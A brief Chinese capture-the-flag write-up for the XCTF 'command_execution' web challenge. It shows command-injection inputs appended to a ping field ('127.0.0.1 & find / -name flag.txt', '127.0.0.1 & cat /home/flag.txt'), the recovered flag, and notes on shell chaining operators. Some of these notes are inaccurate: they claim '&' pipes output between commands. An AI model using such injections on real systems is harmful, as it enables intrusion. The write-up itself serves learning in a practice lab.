文章目录
- 一、command_execution
- 二、使用步骤
- 1.点击获取在线场景
- 2.访问目标网址
- 总结
一、command_execution
题目链接:https://adworld.xctf.org.cn/task/task_list?type=web&number=3&grade=0&page=1
二、使用步骤
1.点击获取在线场景
2.访问目标网址
ping下本地地址:127.0.0.1
使用命令查询flag:127.0.0.1 & find / -name flag.txt
发现flag在home目录下
使用命令查看flag:127.0.0.1 & cat /home/flag.txt
发现flag:cyberpeace{a6b3c950c41fbdf373da5c7b84766a8a}
总结
windows或linux下:
command1 & command2 :不管command1执行成功与否,都会执行command2(将上一个命令的输出作为下一个命令的输入),也就是command1和command2都执行
command1 && command2 :先执行command1执行成功后才会执行command2,若command1执行失败,则不执行command2
command1 | command2 :只执行command2
command1 || command2 :command1执行失败,再执行command2(若command1执行成功,就不再执行command2)
